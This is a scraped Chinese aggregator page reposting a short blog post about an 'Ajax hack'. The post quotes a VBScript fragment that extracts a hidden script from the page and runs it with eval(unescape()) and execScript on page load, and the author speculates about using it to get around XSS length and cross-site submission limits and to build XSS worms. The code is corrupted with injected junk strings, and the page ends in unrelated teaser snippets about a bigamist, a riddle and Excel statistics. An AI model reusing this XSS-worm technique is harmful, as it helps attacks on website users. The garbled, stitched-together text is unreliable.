乙個有趣的Ajax Hack示範

2022-09-24 13:48:12 字數 1284 閱讀 9738

今天在夢之光芒的blog上看見了乙個ajax hack示範,其實跨站發現很容易,但是要做到大危害還是很難,偷偷cookie什麼的只針對使用者而已,xss worm的那種利用才是可怕的。

來看看他的一段vbscript指令碼

複製** **如下:

s=s&""p=i程式設計客棧nstr(1,pg,""""iloveuning-begin"""")""&l: 

s=s&""if p=null or p< then exit sub""&l: 

s=s&""p=insdoqyubcnfbtr(p,pg,chr(37))""&l: 

s=s&""if p=null or p<1 then exit sub""&l: 

s=s&""p2=instr(p,pg,chr(60))""&l: 

s=s&""cd=mid(pg,p,p2-p)""&l: 

s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&ldoqyubcnfb: 

s=s&""window.execscript ht,""""jscript""""""&l: 

s=s&""end sub""&l: 

execute(s): 

document.body.onload=getref(""mycode""): 

") 呼叫**在 

這樣就實現了本站呼叫**,換個思路,是否這就解決了ajax hack常用的的提交資料限制(站外提交沒有許可權,xss**長度限制)的問題,呵呵~這裡我也沒實驗。

再還有乙個思路就是劍心的分片寫入指令碼再eval出來~這兩個思路結合起來,也許我們就能在苛刻的xss漏洞www.cppcns.com上創造奇蹟!

本文標題: 乙個有趣的ajax hack示範

本文位址:

乙個有趣的故事

我有乙個老同學,乙個人娶了兩個老婆,一中一外。這件事情在紐約的華人裡面非常轟動,老同學自己從來不迴避,他經常出沒各種派對,嘴裡叼著雪茄菸,手裡拿著香檳說 我他媽得做個床,能睡三個人的床連他媽美國都沒賣的。老同學的大老婆是個美國人,在華爾街做事情,而且非常出色 二老婆是上海人,我沒見過本人,只看過 漂...

乙個有趣的題目

看到qq群裡有人發了乙個很有意思的題目 如果 昨天是明天就好了,那麼今天就是周五了,請問句中的今天是週幾?晚上睡覺的時候又想起這個問題,發現這個問題還大有文章,其實問題的關鍵在於上面的綠色背景的如果兩個字,既然是如果,那麼思維就可以完全發散,如果時間可以穿越,明天真的可以穿越到昨天,那麼今天其實就是...

乙個有趣的統計

出於好玩的態度,我從4月起開始持續對我的部落格每日訪問情況在excel中做了個記錄,記錄的格式如下 今天頭腦中突然閃過乙個念頭,對週末和非週末的訪問情況做個統計,於是寫了個模組 sub statistic dim i as integer dim visitdatestr as string dim...